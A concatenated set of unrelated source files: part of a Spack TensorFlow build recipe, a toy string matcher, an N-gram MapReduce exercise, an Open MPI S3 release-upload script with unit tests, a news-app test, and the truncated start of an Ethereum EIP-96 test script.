depends_on('py-numpy@1.11.0:', type=('build', 'run'))
depends_on('py-six@1.10.0:', type=('build', 'run'))
depends_on('py-protobuf@3.6.0:', type=('build', 'run'), when='@1.8.0:')
depends_on('py-protobuf@3.3.0:', type=('build', 'run'), when='@1.3.0:1.6.0')
depends_on('py-protobuf@3.0.0b2', type=('build', 'run'), when='@:1.2.0')
depends_on('py-wheel', type=('build', 'run'))
depends_on('py-mock@2.0.0:', type=('build', 'run'))
depends_on('py-enum34@1.1.6:', type=('build', 'run'), when='@1.5.0: ^python@:3.3.999')
depends_on('py-absl-py@0.1.6', type=('build', 'run'), when='@1.5.0:')
depends_on('py-astor@0.1.6:', type=('build', 'run'), when='@1.6.0:')
depends_on('py-gast@0.2.0:', type=('build', 'run'), when='@1.6.0:')
depends_on('py-grpcio@1.8.6:', type=('build', 'run'), when='@1.6.0:')
depends_on('py-termcolor@1.1.0:', type=('build', 'run'), when='@1.6.0:')
depends_on('py-keras-applications@1.0.6:', type=('build', 'run'), when='@1.12.0:')
depends_on('py-keras-preprocessing@1.0.5:', type=('build', 'run'), when='@1.12.0:')
depends_on('py-h5py', type=('build', 'run'), when='@1.12.0:')
depends_on('py-google-pasta@0.1.2:', type=('build', 'run'), when='@2.0.0:')
patch('url-zlib.patch', when='@0.10.0')
patch('crosstool.patch', when='@1.0.0-rc2') # auch auf 0.10.0 wenn mit cuda!
patch('sha-icu.patch', when='@1.13.1')
variant('gcp', default=False,
description='Enable Google Cloud Platform Support')
variant('cuda', default=False,
description='Enable CUDA Support')
# openssl can be used to replace bazel's boringssl
# e.g., when system openssl is available, boringssl runs into namespace conflicts
variant('openssl', default=False,
description='Build with openssl instead of Bazel boringssl')
depends_on('cuda', when='+cuda')
depends_on('cudnn', when='+cuda')
depends_on('openssl@1.0.2:', type=('build', 'run'), when='@1.12.0:+openssl')
def setup_environment(self, spack_env, run_env):
# needed when building with openssl instead of bazel's boringssl
if self.spec.satisfies('@1.12.0:+openssl'):
openssl_lib_path = self.spec['openssl'].libs.search_flags[2:]
spack_env.prepend_path('LD_LIBRARY_PATH', openssl_lib_path)
run_env.prepend_path('LD_LIBRARY_PATH', openssl_lib_path)
def install(self, spec, prefix):
if '+gcp' in spec:
env['TF_NEED_GCP'] = '1'
else:
env['TF_NEED_GCP'] = '0'
env['PYTHON_BIN_PATH'] = str(spec['python'].prefix.bin) + '/python'
env['SWIG_PATH'] = str(spec['swig'].prefix.bin)
env['GCC_HOST_COMPILER_PATH'] = spack_cc
if '+cuda' in spec:
env['TF_NEED_CUDA'] = '1'
env['TF_CUDA_VERSION'] = str(spec['cuda'].version)
env['CUDA_TOOLKIT_PATH'] = str(spec['cuda'].prefix)
env['TF_CUDNN_VERSION'] = str(spec['cudnn'].version)[0]
env['CUDNN_INSTALL_PATH'] = str(spec['cudnn'].prefix)
env['TF_CUDA_COMPUTE_CAPABILITIES'] = '3.5,5.2'
else:
env['TF_NEED_CUDA'] = '0'
env['TF_CUDA_VERSION'] = ''
env['CUDA_TOOLKIT_PATH'] = ''
env['TF_CUDNN_VERSION'] = ''
env['CUDNN_INSTALL_PATH'] = ''
if self.spec.satisfies('@1.0.0-rc2:'):
env['CC_OPT_FLAGS'] = '-march=x86-64 -mtune=generic'
env['TF_NEED_JEMALLOC'] = '0'
env['TF_NEED_HDFS'] = '0'
env['TF_ENABLE_XLA'] = '0'
env['PYTHON_LIB_PATH'] = self.module.site_packages_dir
env['TF_NEED_OPENCL'] = '0'
# additional config options starting with version 1.2
if self.spec.satisfies('@1.2.0:'):
env['TF_NEED_MKL'] = '0'
env['TF_NEED_VERBS'] = '0'
# additional config options starting with version 1.3
if self.spec.satisfies('@1.3.0:'):
env['TF_NEED_MPI'] = '0'
# additional config options starting with version 1.5
if self.spec.satisfies('@1.5.0:'):
env['TF_NEED_S3'] = '0'
env['TF_NEED_GDR'] = '0'
env['TF_NEED_OPENCL_SYCL'] = '0'
env['TF_SET_ANDROID_WORKSPACE'] = '0'
# env variable is somehow ignored -> brute force
filter_file(r'if workspace_has_any_android_rule\(\)', r'if True', 'configure.py')
# additional config options starting with version 1.6
if self.spec.satisfies('@1.6.0:'):
env['TF_NEED_KAFKA'] = '0'
# additional config options starting with version 1.8
if self.spec.satisfies('@1.8.0:'):
env['TF_DOWNLOAD_CLANG'] = '0'
env['TF_NEED_AWS'] = '0'
if self.spec.satisfies('@1.12.0:'):
env['TF_NEED_IGNITE'] = '0'
env['TF_NEED_ROCM'] = '0'
# boringssl error again, build against openssl instead via TF_SYSTEM_LIBS
# does not work for tf < 1.12.0
# (https://github.com/tensorflow/tensorflow/issues/25283#issuecomment-460124556)
if self.spec.satisfies('+openssl'):
env['TF_SYSTEM_LIBS'] = "boringssl"
# set tmpdir to a non-NFS filesystem (because bazel uses ~/.cache/bazel)
# TODO: This should be checked for non-nfsy filesystem, but the current
# best idea for it is to check
# subprocess.call(['stat', '--file-system', '--format=%T', tmp_path])
# to not be nfs. This is only valid for Linux and we'd like to
# stay at least also OSX compatible
# Note: This particular path below /tmp/spack/tmp is required by the visionary container
# build flow:
tmp_path = env.get('SPACK_TMPDIR', '/tmp/spack') + '/tf'
mkdirp(tmp_path)
env['TEST_TMPDIR'] = tmp_path
env['HOME'] = tmp_path
env["CC"] = env["SPACK_CC"]
env["CXX"] = env["SPACK_CXX"]
configure()
# version dependent fixes
if self.spec.satisfies('@1.3.0:1.5.0'):
# checksum for protobuf that bazel downloads (@github) changed, comment out to avoid error
# better solution: replace wrong checksums in workspace.bzl
# wrong one: 6d43b9d223ce09e5d4ce8b0060cb8a7513577a35a64c7e3dad10f0703bf3ad93,
# online: e5fdeee6b28cf6c38d61243adff06628baa434a22b5ebb7432d2a7fbabbdb13d
filter_file(r'sha256 = "6d43b9d223ce09e5d4ce8b0060cb8a7513577a35a64c7e3dad10f0703bf3ad93"',
r'#sha256 = "6d43b9d223ce09e5d4ce8b0060cb8a7513577a35a64c7e3dad10f0703bf3ad93"',
'tensorflow/workspace.bzl')
# starting with tensorflow 1.3, tensorboard becomes a dependency
# (...but is not really needed? Tensorboard should depend on tensorflow, not the other way!)
# -> remove from list of required packages
filter_file(r"'tensorflow-tensorboard",
r"#'tensorflow-tensorboard",
'tensorflow/tools/pip_package/setup.py')
if self.spec.satisfies('@1.5.0:'):
# google cloud support seems to be installed on default, leading to boringssl error
# manually set the flag to false to avoid installing gcp support
# (https://github.com/tensorflow/tensorflow/issues/20677#issuecomment-404634519)
filter_file(r'--define with_gcp_support=true',
r'--define with_gcp_support=false',
'.tf_configure.bazelrc')
if self.spec.satisfies('@1.6.0:'):
# tensorboard name changed
filter_file(r"'tensorboard >=",
r"#'tensorboard >=",
'tensorflow/tools/pip_package/setup.py')
if self.spec.satisfies('@1.8.0:'):
# 1.8.0 and 1.9.0 aborts with numpy import error during python_api generation
# somehow the wrong PYTHONPATH is used...set --distinct_host_configuration=false as a workaround
# (https://github.com/tensorflow/tensorflow/issues/22395#issuecomment-431229451)
filter_file('build --action_env TF_NEED_OPENCL_SYCL="0"',
'build --action_env TF_NEED_OPENCL_SYCL="0"\n'
'build --distinct_host_configuration=false\n'
'build --action_env PYTHONPATH="{0}"'.format(env['PYTHONPATH']),
'.tf_configure.bazelrc')
if self.spec.satisfies('@1.12.0:+openssl'):
# add link to spack-installed openssl libs (needed when spack openssl replaces boringssl)
filter_file('-lssl', '-lssl '+self.spec['openssl'].libs.search_flags, 'third_party/systemlibs/boringssl.BUILD')
filter_file('-lcrypto', '-lcrypto '+self.spec['openssl'].libs.search_flags, 'third_party/systemlibs/boringssl.BUILD')
if self.spec.satisfies('@1.13.1'):
# tensorflow_estimator is an API for tensorflow
# tensorflow-estimator imports tensorflow during build, so tensorflow has to be set up first
filter_file(r"'tensorflow_estimator >=",
r"#'tensorflow_estimator >=",
'tensorflow/tools/pip_package/setup.py')
if self.spec.satisfies('@2.0.0:'):
# now it depends on the nightly versions...
filter_file(r"'tf-estimator-nightly >=",
r"#'tf-estimator-nightly >=",
'tensorflow/tools/pip_package/setup.py')
filter_file(r"REQUIRED_PACKAGES\[i\] = 'tb-nightly >=",
r"pass #REQUIRED_PACKAGES\[i\] = 'tb-nightly >=",
'tensorflow/tools/pip_package/setup.py')
filter_file(r"'tb-nightly >=",
r"#'tb-nightly >=",
'tensorflow/tools/pip_package/setup.py')
if '+cuda' in spec:
bazel('-c', 'opt', '--config=cuda', '//tensorflow/tools/pip_package:build_pip_package')
else:
bazel('-c', 'opt', '//tensorflow/tools/pip_package:build_pip_package')
build_pip_package = Executable('bazel-bin/tensorflow/tools/pip_package/build_pip_package')
build_pip_package(tmp_path)
# using setup.py for installation
# webpage suggests: sudo pip install /tmp/tensorflow_pkg/tensorflow-0.XYZ.whl
mkdirp('_python_build')
cd('_python_build')
ln = which('ln')
for fn in glob("../bazel-bin/tensorflow/tools/pip_package/build_pip_package.runfiles/org_tensorflow/*"):
ln('-s', fn, '.')
for fn in glob("../tensorflow/tools/pip_package/*"):
ln('-s', fn, '.')
setup_py('install', '--prefix={0}'.format(prefix))
| 2.234375 | 2 |
YASDSSSS.py | lonomoji/vampy-portfolio | 0 | 12769690 | <filename>YASDSSSS.py<gh_stars>0
print("What is yas?")
word = input()
def isYas(word):
Yasses = True
state=0
for i in range(len(word)):
if word[i].isalpha():
if state == 0:
if word[i] in ["Y","y"]:
state=1
else:
Yasses = False
elif state == 1:
if word[i] in ["Y","y"]:
state=1
elif word[i] in ["A","a"]:
state=2
else:
Yasses = False
elif state == 2:
if word[i]in ["A","a"]:
state = 2
elif word[i]in ["S","s"]:
state = 3
else:
Yasses = False
elif state == 3:
if word[i]in ["S","s"]:
state = 3
else:
Yasses = False
if state != 3:
Yasses = False
return Yasses
isYas(word)
answer=isYas(word)
print(answer)
| 4 | 4 |
0501-0600/0537-N-Gram (Map Reduce)/0537-N-Gram (Map Reduce).py | jiadaizhao/LintCode | 77 | 12769691 | <filename>0501-0600/0537-N-Gram (Map Reduce)/0537-N-Gram (Map Reduce).py
class NGram:
# @param {int} n a integer
# @param {str} string a string
def mapper(self, _, n, string):
# Write your code here
# Please use 'yield key, value' here
for i in range(len(string) - n + 1):
yield string[i:i + n], 1
# @param key is from mapper
# @param values is a set of value with the same key
def reducer(self, key, values):
# Write your code here
# Please use 'yield key, value' here
yield key, sum(values)
| 3.203125 | 3 |
dist/uploadutils.py | bwbarrett/ompi-scripts | 1 | 12769692 | #!/usr/bin/python
#
# Copyright (c) 2018 Amazon.com, Inc. or its affiliates. All Rights
# Reserved.
#
# Additional copyrights may follow
#
import boto3
import botocore
import sys
import re
import os
import json
import tarfile
import hashlib
from io import StringIO
import datetime
import unittest
import mock
import posix
def __unique_assign(releaseinfo, key, value):
if not key in releaseinfo:
releaseinfo[key] = value
elif releaseinfo[key] != value:
raise Exception('Found files from two %ss: %s %s' %
(key, releaseinfo[key], value))
def __compute_hashes(filename):
"""Helper function to compute MD5 and SHA1 hashes"""
retval = {}
md5 = hashlib.md5()
sha1 = hashlib.sha1()
sha256 = hashlib.sha256()
with open(filename, 'rb') as f:
while True:
data = f.read(64 * 1024)
if not data:
break
md5.update(data)
sha1.update(data)
sha256.update(data)
retval['md5'] = md5.hexdigest()
retval['sha1'] = sha1.hexdigest()
retval['sha256'] = sha256.hexdigest()
return retval
def __query_yes_no(question, default="yes"):
"""Ask a yes/no question via input() and return their answer.
"question" is a string that is presented to the user.
"default" is the presumed answer if the user just hits <Enter>.
It must be "yes" (the default), "no" or None (meaning
an answer is required of the user).
The "answer" return value is True for "yes" or False for "no".
"""
valid = {"yes": True, "y": True, "ye": True,
"no": False, "n": False}
if default is None:
prompt = " [y/n] "
elif default == "yes":
prompt = " [Y/n] "
elif default == "no":
prompt = " [y/N] "
else:
raise ValueError("invalid default answer: '%s'" % default)
while True:
sys.stdout.write(question + prompt)
choice = input().lower()
if default is not None and choice == '':
return valid[default]
elif choice in valid:
return valid[choice]
else:
sys.stdout.write("Please respond with 'yes' or 'no' "
"(or 'y' or 'n').\n")
def parse_versions(filelist):
"""Parse the project name, branch, file basename, and version name from a file list
We're pretty conservative in this function, because it's an
optimization over specifying a bunch of command linke arguments
explicitly. Add projects / regexes as necessary...
"""
releaseinfo = {}
build_unix_time = 0
for filename in filelist:
if re.search(r'openmpi|OpenMPI', filename):
m = re.search(r'openmpi\-([0-9a-zA-Z\.]+)(?:\.tar|\-[0-9]+\.src\.rpm|\.dmg.gz)',
filename)
if m == None:
m = re.search(r'OpenMPI_v([0-9a-zA-Z\.]+)\-[0-9]+_win', filename)
if m == None:
raise Exception('Could not parse Open MPI filename: %s' % (filename))
# yes, we mean open-mpi for the project. We perhaps were
# silly in naming the branch in S3.
__unique_assign(releaseinfo, 'basename', 'openmpi')
__unique_assign(releaseinfo, 'project', 'open-mpi')
__unique_assign(releaseinfo, 'version', m.group(1))
elif re.search('^hwloc-', filename):
m = re.search(r'hwloc\-([0-9a-zA-Z\.]+)(?:\.tar|\-[0-9]+\.src\.rpm)',
filename)
if m == None:
m = re.search(r'hwloc-win[0-9]+-build-([0-9a-zA-Z\.]+)\.zip', filename)
if m == None:
raise Exception('Could not parse hwloc filename: %s' % (filename))
__unique_assign(releaseinfo, 'basename', 'hwloc')
__unique_assign(releaseinfo, 'project', 'hwloc')
__unique_assign(releaseinfo, 'version', m.group(1))
else:
raise Exception('Could not parse %s' % (filename))
m = re.search(r'^[0-9]+\.[0-9]+', releaseinfo['version'])
if m == None:
raise Exception('Could not parse version %s' % (releaseinfo['version']))
__unique_assign(releaseinfo, 'branch', 'v%s' % (m.group(0)))
if build_unix_time == 0 and re.search('\.tar\.', filename):
try:
tar = tarfile.open(filename)
except:
raise
else:
# rather than look at the ctime and mtime of the
# tarball (which may change as tarballs are copied
# around), look at the top level directory (first
# entry in the tarball) for a mtime.
build_unix_time = tar.getmembers()[0].mtime
if build_unix_time != 0:
releaseinfo['build_unix_time'] = build_unix_time
return releaseinfo
def upload_files(s3_client, s3_bucket, s3_key_prefix, release_info, files, prompt):
# first, verify that the key_prefix exists. We are chicken here
# and won't create it.
result = s3_client.list_objects_v2(Bucket = s3_bucket,
Prefix = s3_key_prefix)
if s3_bucket != 'open-mpi-scratch' and result['KeyCount'] == 0:
raise Exception('s3://%s/%s does not appear to be a valid prefix.' %
(s3_bucket, full_key_prefix))
# figure out if project and branch exist...
new = ""
project_key_path = '%s/%s' % (s3_key_prefix, release_info['project'])
branch_key_path = '%s/%s' % (project_key_path, release_info['branch'])
# print some release info
print('Upload path: s3://%s/%s' % (s3_bucket, branch_key_path))
print('Project: %s' % release_info['project'])
print('Version: %s' % release_info['version'])
print('Branch: %s' % release_info['branch'])
print('Date: %s' % datetime.datetime.fromtimestamp(release_info['build_unix_time']))
branch_result = s3_client.list_objects_v2(Bucket = s3_bucket,
Prefix = branch_key_path)
if branch_result['KeyCount'] == 0:
project_result = s3_client.list_objects_v2(Bucket = s3_bucket,
Prefix = project_key_path)
if project_result['KeyCount'] == 0:
print(' * New project %s and branch %s' %
(release_info['project'], release_info['branch']))
else:
print(' * New branch %s' % (release_info['branch']))
# and check for existing release
build_filename = '%s/build-%s-%s.json' % (branch_key_path, release_info['basename'],
release_info['version'])
try:
response = s3_client.get_object(Bucket = s3_bucket, Key = build_filename)
buildinfo = json.load(response['Body'])
buildinfo_found = True
except botocore.exceptions.ClientError as e:
code = e.response['Error']['Code']
if code == 'NoSuchKey':
buildinfo_found = False
else:
raise
buildinfo = {}
buildinfo['files'] = {}
# check if we would overwrite a file and verify that would be ok...
will_overwrite = False
if buildinfo_found:
print('Existing release found for %s %s' %
(release_info['basename'], release_info['version']))
print(' * Existing files that will not change:')
for filename in buildinfo['files']:
if not filename in files:
print(' - %s' % filename)
print(' * Existing files that will be overwritten:')
for filename in buildinfo['files']:
if filename in files:
will_overwrite = True
print(' - %s' % filename)
print(' * New files:')
for filename in files:
filename = os.path.basename(filename)
if not filename in buildinfo['files']:
print(' - %s' % filename)
else:
print('New release for %s %s' %
(release_info['basename'], release_info['version']))
print(' * Files to upload:')
for filename in files:
filename = os.path.basename(filename)
print(' - %s' % filename)
print('')
if prompt == 'ALWAYS_PROMPT':
if not __query_yes_no('Continue?', 'no'):
print('Aborting due to user selection')
return
elif prompt == 'NO_OVERWRITE':
if will_overwrite:
print('Aborting due to --yes and file overwrite')
return
elif prompt == 'NEVER_PROMPT':
pass
elif prompt == 'ASSUME_NO':
print('Aborting due to ASSUME_NO')
return
else:
raise Exception('Unknown Prompt value %d' % prompt)
# build a build-info structure for the release, possibly building
# on the old one...
buildinfo['branch'] = release_info['branch']
buildinfo['valid'] = True
buildinfo['revision'] = release_info['version']
buildinfo['build_unix_time'] = release_info['build_unix_time']
buildinfo['delete_on'] = 0
for filename in files:
info = os.stat(filename)
hashes = __compute_hashes(filename)
fileinfo = {}
fileinfo['sha1'] = hashes['sha1']
fileinfo['sha256'] = hashes['sha256']
fileinfo['md5'] = hashes['md5']
fileinfo['size'] = info.st_size
buildinfo['files'][os.path.basename(filename)] = fileinfo
for filename in files:
target_name = '%s/%s' % (branch_key_path, os.path.basename(filename))
s3_client.upload_file(filename, s3_bucket, target_name)
buildinfo_str = json.dumps(buildinfo)
s3_client.put_object(Bucket = s3_bucket, Key = build_filename,
Body = buildinfo_str)
######################################################################
#
# Unit Test Code
#
######################################################################
def _test_stat(filename):
info = posix.stat_result((0, 0, 0, 0, 0, 0, 987654, 0, 0, 0))
return info
def _test_compute_hashes(filename):
retval = {}
retval['md5'] = "ABC"
retval['sha1'] = "ZYX"
return retval
class _test_tarfile():
def __init__(self):
pass
def getmembers(self):
info = tarfile.TarInfo
info.mtime = 12345
return [info]
@classmethod
def open(cls, filename):
return _test_tarfile()
class parse_versions_tests(unittest.TestCase):
@mock.patch('tarfile.open', _test_tarfile.open)
def test_ompi_release(self):
filelist = ["openmpi-1.4.0.tar.gz",
"openmpi-1.4.0.tar.bz2",
"openmpi-1.4.0-1.src.rpm"]
releaseinfo = parse_versions(filelist)
self.assertEqual(releaseinfo['project'], "open-mpi",
releaseinfo['project'] + " != open-mpi")
self.assertEqual(releaseinfo['basename'], "openmpi",
releaseinfo['basename'] + " != openmpi")
self.assertEqual(releaseinfo['branch'], "v1.4",
releaseinfo['branch'] + " != v1.4")
self.assertEqual(releaseinfo['version'], "1.4.0",
releaseinfo['version'] + " != 1.4.0")
self.assertEqual(releaseinfo['build_unix_time'], 12345,
str(releaseinfo['build_unix_time']) + " != 12345")
@mock.patch('tarfile.open', _test_tarfile.open)
def test_ompi_release_second_srpm(self):
filelist = ["openmpi-1.4.0.tar.gz",
"openmpi-1.4.0.tar.bz2",
"openmpi-1.4.0-2.src.rpm"]
releaseinfo = parse_versions(filelist)
self.assertEqual(releaseinfo['project'], "open-mpi",
releaseinfo['project'] + " != open-mpi")
self.assertEqual(releaseinfo['basename'], "openmpi",
releaseinfo['basename'] + " != openmpi")
self.assertEqual(releaseinfo['branch'], "v1.4",
releaseinfo['branch'] + " != v1.4")
self.assertEqual(releaseinfo['version'], "1.4.0",
releaseinfo['version'] + " != 1.4.0")
@mock.patch('tarfile.open', _test_tarfile.open)
def test_ompi_binaries(self):
filelist = ["openmpi-1.4.0.tar.gz",
"openmpi-1.4.0.tar.bz2",
"openmpi-1.4.0-1.src.rpm",
"openmpi-1.4.0.dmg.gz",
"OpenMPI_v1.4.0-1_win64.exe"]
releaseinfo = parse_versions(filelist)
self.assertEqual(releaseinfo['project'], "open-mpi",
releaseinfo['project'] + " != open-mpi")
self.assertEqual(releaseinfo['basename'], "openmpi",
releaseinfo['basename'] + " != openmpi")
self.assertEqual(releaseinfo['branch'], "v1.4",
releaseinfo['branch'] + " != v1.4")
self.assertEqual(releaseinfo['version'], "1.4.0",
releaseinfo['version'] + " != 1.4.0")
@mock.patch('tarfile.open', _test_tarfile.open)
def test_ompi_prerelease(self):
filelist = ["openmpi-1.4.0rc1.tar.gz",
"openmpi-1.4.0rc1.tar.bz2",
"openmpi-1.4.0rc1-1.src.rpm"]
releaseinfo = parse_versions(filelist)
self.assertEqual(releaseinfo['project'], "open-mpi",
releaseinfo['project'] + " != open-mpi")
self.assertEqual(releaseinfo['basename'], "openmpi",
releaseinfo['basename'] + " != openmpi")
self.assertEqual(releaseinfo['branch'], "v1.4",
releaseinfo['branch'] + " != v1.4")
self.assertEqual(releaseinfo['version'], "1.4.0rc1",
releaseinfo['version'] + " != 1.4.0rc1")
@mock.patch('tarfile.open', _test_tarfile.open)
def test_ompi_mixed_versions(self):
filelist = ["openmpi-1.4.0.tar.gz",
"openmpi-1.4.1.tar.bz2",
"openmpi-1.4.0-1.src.rpm"]
try:
releaseinfo = parse_versions(filelist)
except Exception as e:
pass
else:
self.fail()
@mock.patch('tarfile.open', _test_tarfile.open)
def test_hwloc_release(self):
filelist = ["hwloc-1.4.0.tar.gz",
"hwloc-1.4.0.tar.bz2",
"hwloc-win32-build-1.4.0.zip",
"hwloc-win64-build-1.4.0.zip"]
releaseinfo = parse_versions(filelist)
self.assertEqual(releaseinfo['project'], "hwloc",
releaseinfo['project'] + " != hwloc")
self.assertEqual(releaseinfo['basename'], "hwloc",
releaseinfo['basename'] + " != hwloc")
self.assertEqual(releaseinfo['branch'], "v1.4",
releaseinfo['branch'] + " != v1.4")
self.assertEqual(releaseinfo['version'], "1.4.0",
releaseinfo['version'] + " != 1.4.0")
@mock.patch('tarfile.open', _test_tarfile.open)
def test_hwloc_prerelease(self):
filelist = ["hwloc-1.4.0rc1.tar.gz",
"hwloc-1.4.0rc1.tar.bz2",
"hwloc-win32-build-1.4.0rc1.zip",
"hwloc-win64-build-1.4.0rc1.zip"]
releaseinfo = parse_versions(filelist)
self.assertEqual(releaseinfo['project'], "hwloc",
releaseinfo['project'] + " != hwloc")
self.assertEqual(releaseinfo['basename'], "hwloc",
releaseinfo['basename'] + " != hwloc")
self.assertEqual(releaseinfo['branch'], "v1.4",
releaseinfo['branch'] + " != v1.4")
self.assertEqual(releaseinfo['version'], "1.4.0rc1",
releaseinfo['version'] + " != 1.4.0rc1")
@mock.patch('tarfile.open', _test_tarfile.open)
def test_hwloc_mixed_versions(self):
filelist = ["hwloc-1.4.0.tar.gz",
"hwloc-1.4.1.tar.bz2",
"hwloc-win32-build-1.4.0.zip",
"hwloc-win64-build-1.4.0.zip"]
try:
releaseinfo = parse_versions(filelist)
except Exception as e:
pass
else:
self.fail()
@mock.patch('tarfile.open', _test_tarfile.open)
def test_hwloc_mixed_versions2(self):
filelist = ["hwloc-1.4.0.tar.gz",
"hwloc-1.4.0.tar.bz2",
"hwloc-win32-build-1.4.1.zip",
"hwloc-win64-build-1.4.0.zip"]
try:
releaseinfo = parse_versions(filelist)
except Exception as e:
pass
else:
self.fail()
# we didn't teach the parser about netloc (because it's dead), so
# this should fail
def test_netloc(self):
filelist = ["netloc-1.4.0.tar.gz",
"netloc-1.4.0.tar.bz2"]
try:
releaseinfo = parse_versions(filelist)
except Exception as e:
pass
else:
self.fail()
class upload_files_tests(unittest.TestCase):
class test_s3_client():
def __init__(self, path, Existing = False):
self._readcount = 0
self._file_write_list = []
self._stream_write = ""
self._path = path
self._existing = Existing
def get_object(self, Bucket, Key):
self._readcount += 1
result = {}
if not self._existing or Key != self._path + 'build-openmpi-100.0.0rho1.json':
response = {}
response['Error'] = {}
response['Error']['Code'] = 'NoSuchKey'
raise botocore.exceptions.ClientError(response, 'get_object')
buildinfo = {}
buildinfo['branch'] = 'v100.0'
buildinfo['valid'] = True
buildinfo['revision'] = '100.0.0rho1'
buildinfo['build_unix_time'] = 314314
buildinfo['delete_on'] = 0
buildinfo['files'] = {}
fileinfo = {}
fileinfo['sha1'] = 'abc'
fileinfo['md5'] = 'zyx'
fileinfo['size'] = 1024
buildinfo['files']['openmpi-100.0.0rho1.tar.bz2'] = fileinfo
result['Body'] = StringIO(json.dumps(buildinfo))
return result
def list_objects_v2(self, Bucket, Prefix):
self._readcount += 1
result = {}
if self._path.startswith(Prefix):
result['KeyCount'] = 1
else:
result['KeyCount'] = 0
return result
def upload_file(self, Filename, Bucket, Key):
assert(Key.startswith(self._path))
self._file_write_list.append(Key)
def put_object(self, Bucket, Key, Body):
assert(Key.startswith(self._path))
self._file_write_list.append(Key)
self._stream_write += Body
def get_readcount(self):
return self._readcount
def get_write_list(self):
return self._file_write_list
def get_write_stream(self):
return self._stream_write
@mock.patch('os.stat', _test_stat)
@mock.patch('__main__.__compute_hashes', _test_compute_hashes)
def test_new_buildinfo(self):
releaseinfo = {}
releaseinfo['project'] = 'open-mpi'
releaseinfo['branch'] = 'v100.0'
releaseinfo['version'] = '100.0.0rho1'
releaseinfo['basename'] = 'openmpi'
releaseinfo['build_unix_time'] = 12345
files = ['openmpi-100.0.0rho1.tar.gz', 'openmpi-100.0.0rho1.tar.bz2']
client = self.test_s3_client("scratch/open-mpi/v100.0/", Existing = False)
upload_files(client, 'open-mpi-scratch', 'scratch',
releaseinfo, files, 'NO_OVERWRITE')
self.assertEqual(client.get_readcount(), 3,
"readcount was %d, expected 3" % (client.get_readcount()))
self.assertEqual(len(client.get_write_list()), 3,
"Unexpected write list length: %s" % str(client.get_write_list()))
buildinfo = json.loads(client.get_write_stream())
self.assertEqual(len(buildinfo['files']), 2,
'Unexpected files length: %s' % str(buildinfo['files']))
def test_existing_buildinfo_nocontinue(self):
releaseinfo = {}
releaseinfo['project'] = 'open-mpi'
releaseinfo['branch'] = 'v100.0'
releaseinfo['version'] = '100.0.0rho1'
releaseinfo['basename'] = 'openmpi'
releaseinfo['build_unix_time'] = 1
files = ['openmpi-100.0.0rho1.tar.gz']
client = self.test_s3_client("scratch/open-mpi/v100.0/", Existing = True)
upload_files(client, 'open-mpi-scratch', 'scratch',
releaseinfo, files, 'ASSUME_NO')
self.assertEqual(client.get_readcount(), 3,
"readcount was %d, expected 3" % (client.get_readcount()))
self.assertEqual(len(client.get_write_list()), 0,
"Unexpected write list length: %s" % str(client.get_write_list()))
@mock.patch('os.stat', _test_stat)
@mock.patch('__main__.__compute_hashes', _test_compute_hashes)
def test_existing_buildinfo_nooverlap(self):
releaseinfo = {}
releaseinfo['project'] = 'open-mpi'
releaseinfo['branch'] = 'v100.0'
releaseinfo['version'] = '100.0.0rho1'
releaseinfo['basename'] = 'openmpi'
releaseinfo['build_unix_time'] = 1
files = ['openmpi-100.0.0rho1.tar.gz']
client = self.test_s3_client("scratch/open-mpi/v100.0/", Existing = True)
upload_files(client, 'open-mpi-scratch', 'scratch',
releaseinfo, files, 'NO_OVERWRITE')
self.assertEqual(client.get_readcount(), 3,
"readcount was %d, expected 3" % (client.get_readcount()))
self.assertEqual(len(client.get_write_list()), 2,
"Unexpected write list length: %s" % str(client.get_write_list()))
buildinfo = json.loads(client.get_write_stream())
self.assertEqual(len(buildinfo['files']), 2,
'Unexpected files length: %s' % str(buildinfo['files']))
@mock.patch('os.stat', _test_stat)
@mock.patch('__main__.__compute_hashes', _test_compute_hashes)
def test_existing_buildinfo_overlap_ok(self):
releaseinfo = {}
releaseinfo['project'] = 'open-mpi'
releaseinfo['branch'] = 'v100.0'
releaseinfo['version'] = '100.0.0rho1'
releaseinfo['basename'] = 'openmpi'
releaseinfo['build_unix_time'] = 1
files = ['openmpi-100.0.0rho1.tar.gz', 'openmpi-100.0.0rho1.tar.bz2']
client = self.test_s3_client("scratch/open-mpi/v100.0/", Existing = True)
upload_files(client, 'open-mpi-scratch', 'scratch',
releaseinfo, files, 'NEVER_PROMPT')
self.assertEqual(client.get_readcount(), 3,
"readcount was %d, expected 3" % (client.get_readcount()))
self.assertEqual(len(client.get_write_list()), 3,
"Unexpected write list length: %s" % str(client.get_write_list()))
buildinfo = json.loads(client.get_write_stream())
self.assertEqual(len(buildinfo['files']), 2,
'Unexpected files length: %s' % str(buildinfo['files']))
@mock.patch('os.stat', _test_stat)
@mock.patch('__main__.__compute_hashes', _test_compute_hashes)
def test_existing_buildinfo_overlap_fail(self):
releaseinfo = {}
releaseinfo['project'] = 'open-mpi'
releaseinfo['branch'] = 'v100.0'
releaseinfo['version'] = '100.0.0rho1'
releaseinfo['basename'] = 'openmpi'
releaseinfo['build_unix_time'] = 1
files = ['openmpi-100.0.0rho1.tar.gz', 'openmpi-100.0.0rho1.tar.bz2']
client = self.test_s3_client("scratch/open-mpi/v100.0/", Existing = True)
upload_files(client, 'open-mpi-scratch', 'scratch',
releaseinfo, files, 'NO_OVERWRITE')
self.assertEqual(client.get_readcount(), 3,
"readcount was %d, expected 3" % (client.get_readcount()))
self.assertEqual(len(client.get_write_list()), 0,
"Unexpected write list length: %s" % str(client.get_write_list()))
if __name__ == '__main__':
unittest.main()
| 2.9375 | 3 |
tests/test_articles.py | Mzazi25/newsApp | 0 | 12769693 | <reponame>Mzazi25/newsApp<gh_stars>0
import unittest
from app.models import Articles
class ArticleSourceTest(unittest.TestCase):
'''
Test Class to test the behavior of the Article Sources
'''
def setUp(self):
'''
setup method that runs before every test
'''
self.new_article = Articles("Mpasho","<NAME>","Sisi ni wale wabaya","www.href.com","www.href.com", "date 25","Welcome")
def test_instance(self):
self.assertTrue(isinstance(self.new_article,Articles))
| 3.171875 | 3 |
eip96/eip_96_test_script.py | kevaundray/research | 1,351 | 12769694 | from ethereum import tester, vm
from ethereum.utils import sha3, encode_int32, safe_ord, encode_hex
from ethereum.state_transition import apply_message
s = tester.state()
c = s.contract('eip_96_blockhash_getter.se.py')
blockhash_addr = b'\x00' * 19 + b'\x10'
system_addr = b'\xff' * 19 + b'\xfe'
s.state.set_code(blockhash_addr, s.state.get_code(c))
def mk_hash_setting_message(data):
return vm.Message(sender=system_addr, to=blockhash_addr, value=0, gas=1000000, data=data)
print("Setting block hashes")
for i in range(1, 1000):
s.state.block_number = i + 1
